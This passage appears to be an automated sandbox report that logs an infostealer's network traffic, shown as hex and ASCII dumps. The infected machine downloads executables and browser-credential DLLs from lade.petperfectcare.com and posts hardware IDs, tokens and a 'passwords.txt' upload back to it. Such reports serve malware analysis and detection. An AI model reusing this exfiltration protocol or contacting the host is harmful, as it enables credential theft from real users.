00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 07 Oct 2024 16:43:37 GMTContent-Type: application/octet-streamContent-Length: 80880Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-13bf0"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 07 Oct 2024 16:43:37 GMTContent-Type: application/octet-streamContent-Length: 2046288Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-1f3950"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 07 Oct 2024 16:43:45 GMTContent-Type: application/octet-streamContent-Length: 551424Last-Modified: Mon, 07 Oct 2024 16:21:33 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "67040a8d-86a00"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 3d 89 39 06 79 e8 57 55 79 e8 57 55 79 e8 57 55 aa 9a 54 54 75 e8 57 55 aa 9a 52 54 d2 e8 57 55 aa 9a 53 54 6c e8 57 55 aa 9a 56 54 7a e8 57 55 79 e8 56 55 21 e8 57 55 69 6c 54 54 6d e8 57 55 69 6c 53 54 6b e8 57 55 69 6c 52 54 34 e8 57 55 31 6d 5e 54 78 e8 57 55 31 6d a8 55 78 e8 57 55 31 6d 55 54 78 e8 57 55 52 69 63 68 79 e8 57 55 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 8d 0a 04 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 29 00 12 02 00 00 62 06 00 00 00 00 00 52 6f 00 00 00 10 00 00 00 30 02 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 08 00 00 04 00 00 71 34 09 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c0 c6 02 00 28 00 00 00 00 80 08 00 d8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 08 00 d4 1a 00 00 c0 ab 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ab 02 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 02 00 2c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f0 10 02 00 00 10 00 00 00 12 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 78 9d 00 00 00 30 02 00 00 9e 00 00 00 16 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 80 a3 05 00 00 d0 02 00 00 96 05 00 00 b4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 d8 03 00 00 00 80 08 00 00 04 00 00 00 4a 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d4 1a 00 00 00 90 08 00 00 1c 00 00 00 4e 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: lade.petperfectcare.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FIECBFIDGDAKFHIEHJKFHost: lade.petperfectcare.comContent-Length: 256Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 49 45 43 42 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 31 33 38 44 39 44 41 42 35 30 44 32 38 36 35 38 36 36 33 30 39 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 43 42 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 36 39 34 62 36 64 35 30 31 39 39 65 61 34 34 32 30 37 61 39 37 65 32 35 64 64 61 35 35 30 36 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 43 42 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 46 2d 2d 0d 0a Data Ascii: ------FIECBFIDGDAKFHIEHJKFContent-Disposition: form-data; name="hwid"5138D9DAB50D2865866309-a33c7340-61ca------FIECBFIDGDAKFHIEHJKFContent-Disposition: form-data; name="build_id"e694b6d50199ea44207a97e25dda5506------FIECBFIDGDAKFHIEHJKF--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EGCBAFCFIJJJECBGIIJKHost: lade.petperfectcare.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 43 42 41 46 43 46 49 4a 4a 4a 45 43 42 47 49 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 32 36 34 30 64 62 65 38 65 66 65 63 34 62 36 66 34 66 62 36 63 61 35 33 35 61 36 63 35 65 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 41 46 43 46 49 4a 4a 4a 45 43 42 47 49 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 36 39 34 62 36 64 35 30 31 39 39 65 61 34 34 32 30 37 61 39 37 65 32 35 64 64 61 35 35 30 36 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 41 46 43 46 49 4a 4a 4a 45 43 42 47 49 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 31 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 41 46 43 46 49 4a 4a 4a 45 43 42 47 49 49 4a 4b 2d 2d 0d 0a Data Ascii: ------EGCBAFCFIJJJECBGIIJKContent-Disposition: form-data; name="token"372640dbe8efec4b6f4fb6ca535a6c5e------EGCBAFCFIJJJECBGIIJKContent-Disposition: form-data; name="build_id"e694b6d50199ea44207a97e25dda5506------EGCBAFCFIJJJECBGIIJKContent-Disposition: form-data; name="mode"1------EGCBAFCFIJJJECBGIIJK--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JEBKECAFIDAFIECBKEHDHost: lade.petperfectcare.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 42 4b 45 43 41 46 49 44 41 46 49 45 43 42 4b 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 32 36 34 30 64 62 65 38 65 66 65 63 34 62 36 66 34 66 62 36 63 61 35 33 35 61 36 63 35 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 45 43 41 46 49 44 41 46 49 45 43 42 4b 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 36 39 34 62 36 64 35 30 31 39 39 65 61 34 34 32 30 37 61 39 37 65 32 35 64 64 61 35 35 30 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 45 43 41 46 49 44 41 46 49 45 43 42 4b 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 32 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 45 43 41 46 49 44 41 46 49 45 43 42 4b 45 48 44 2d 2d 0d 0a Data Ascii: ------JEBKECAFIDAFIECBKEHDContent-Disposition: form-data; name="token"372640dbe8efec4b6f4fb6ca535a6c5e------JEBKECAFIDAFIECBKEHDContent-Disposition: form-data; name="build_id"e694b6d50199ea44207a97e25dda5506------JEBKECAFIDAFIECBKEHDContent-Disposition: form-data; name="mode"2------JEBKECAFIDAFIECBKEHD--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GIIEGHIDBGHIECAAECGDHost: lade.petperfectcare.comContent-Length: 332Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 49 45 47 48 49 44 42 47 48 49 45 43 41 41 45 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 32 36 34 30 64 62 65 38 65 66 65 63 34 62 36 66 34 66 62 36 63 61 35 33 35 61 36 63 35 65 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 45 47 48 49 44 42 47 48 49 45 43 41 41 45 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 36 39 34 62 36 64 35 30 31 39 39 65 61 34 34 32 30 37 61 39 37 65 32 35 64 64 61 35 35 30 36 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 45 47 48 49 44 42 47 48 49 45 43 41 41 45 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 32 31 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 45 47 48 49 44 42 47 48 49 45 43 41 41 45 43 47 44 2d 2d 0d 0a Data Ascii: ------GIIEGHIDBGHIECAAECGDContent-Disposition: form-data; name="token"372640dbe8efec4b6f4fb6ca535a6c5e------GIIEGHIDBGHIECAAECGDContent-Disposition: form-data; name="build_id"e694b6d50199ea44207a97e25dda5506------GIIEGHIDBGHIECAAECGDContent-Disposition: form-data; name="mode"21------GIIEGHIDBGHIECAAECGD--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KJDGDBFBGIDGIEBGHCGIHost: lade.petperfectcare.comContent-Length: 5289Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sql.dll HTTP/1.1Host: lade.petperfectcare.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GIIEGHIDBGHIECAAECGDHost: lade.petperfectcare.comContent-Length: 4677Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAKEBAKFHCFHIEBFBAFBHost: lade.petperfectcare.comContent-Length: 1529Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAKEBAKFHCFHIEBFBAFBHost: lade.petperfectcare.comContent-Length: 437Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 4b 45 42 41 4b 46 48 43 46 48 49 45 42 46 42 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 32 36 34 30 64 62 65 38 65 66 65 63 34 62 36 66 34 66 62 36 63 61 35 33 35 61 36 63 35 65 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 45 42 41 4b 46 48 43 46 48 49 45 42 46 42 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 36 39 34 62 36 64 35 30 31 39 39 65 61 34 34 32 30 37 61 39 37 65 32 35 64 64 61 35 35 30 36 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 45 42 41 4b 46 48 43 46 48 49 45 42 46 42 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 47 46 7a 63 33 64 76 63 6d 52 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 45 42 41 4b 46 48 43 46 48 49 45 42 46 42 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 64 61 74 61 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 45 42 41 4b 46 48 43 46 48 49 45 42 46 42 41 46 42 2d 2d 0d 0a Data Ascii: ------DAKEBAKFHCFHIEBFBAFBContent-Disposition: form-data; name="token"372640dbe8efec4b6f4fb6ca535a6c5e------DAKEBAKFHCFHIEBFBAFBContent-Disposition: form-data; name="build_id"e694b6d50199ea44207a97e25dda5506------DAKEBAKFHCFHIEBFBAFBContent-Disposition: form-data; name="file_name"cGFzc3dvcmRzLnR4dA==------DAKEBAKFHCFHIEBFBAFBContent-Disposition: form-data; name="file_data"------DAKEBAKFHCFHIEBFBAFB--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IJEGDBGDBFIJKECBAKFBHost: lade.petperfectcare.comContent-Length: 437Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 45 47 44 42 47 44 42 46 49 4a 4b 45 43 42 41 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 32 36 34 30 64 62 65 38 65 66 65 63 34 62 36 66 34 66 62 36 63 61 35 33 35 61 36 63 35 65 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 47 44 42 47 44 42 46 49 4a 4b 45 43 42 41 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 36 39 34 62 36 64 35 30 31 39 39 65 61 34 34 32 30 37 61 39 37 65 32 35 64 64 61 35 35 30 36 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 47 44 42 47 44 42 46 49 4a 4b 45 43 42 41 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 47 46 7a 63 33 64 76 63 6d 52 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 47 44 42 47 44 42 46 49 4a 4b 45 43 42 41 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 64 61 74 61 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 47 44 42 47 44 42 46 49 4a 4b 45 43 42 41 4b 46 42 2d 2d 0d 0a Data Ascii: ------IJEGDBGDBFIJKECBAKFBContent-Disposition: form-data; name="token"372640dbe8efec4b6f4fb6ca535a6c5e------IJEGDBGDBFIJKECBAKFBContent-Disposition: form-data; name="build_id"e694b6d50199ea44207a97e25dda5506------IJEGDBGDBFIJKECBAKFBContent-Disposition: form-data; name="file_name"cGFzc3dvcmRzLnR4dA==------IJEGDBGDBFIJKECBAKFBContent-Disposition: form-data; name="file_data"------IJEGDBGDBFIJKECBAKFB--
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1Host: lade.petperfectcare.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1Host: lade.petperfectcare.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1Host: lade.petperfectcare.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1Host: lade.petperfectcare.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1Host: lade.petperfectcare.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1Host: lade.petperfectcare.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1Host: lade.petperfectcare.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CBKFIECBGDHJKECAKFBGHost: lade.petperfectcare.comContent-Length: 1145Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GCBGCAFIIECBFIDHIJKFHost: lade.petperfectcare.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 32 36 34 30 64 62 65 38 65 66 65 63 34 62 36 66 34 66 62 36 63 61 35 33 35 61 36 63 35 65 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 